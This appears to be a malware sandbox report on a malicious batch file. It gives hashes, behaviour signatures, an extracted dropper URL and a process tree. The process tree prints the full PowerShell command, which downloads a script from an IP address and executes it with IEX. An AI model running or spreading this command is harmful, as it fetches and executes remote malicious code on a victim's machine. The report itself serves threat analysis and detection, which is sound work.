Overview

overview

10

Static

static

d8b4df362b...de.bat

windows7_x64

10

d8b4df362b...de.bat

windows10_x64

10

Analysis

  • max time kernel
    60s
  • max time network
    61s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    12-07-2020 19:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d8b4df362b6cf1bf526634ea889b42de.bat

  • Size

    213B

  • MD5

    fa5f98db7255446f6688e03c1b8639e1

  • SHA1

    9149b6cdcab524d9e06254b52dcdcb0455cdb7ac

  • SHA256

    b64c3249144683345453feac5f2c3ed3374d33a8eaf6bf4e30299e55a1bf1fca

  • SHA512

    e13b67fd455c2e28362529b6cc986135be45d21ad68a8a7b7af6203b4766dce4fe74bd1f8fc16f7de6b09f1b9a787982d4302b2aa26c48c5a6326503b6d3d4a8

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de

Signatures

  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Blacklisted process makes network request 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\d8b4df362b6cf1bf526634ea889b42de.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de');Invoke-CFAKWL;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      PID:892

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/892-0-0x0000000000000000-mapping.dmp
    Download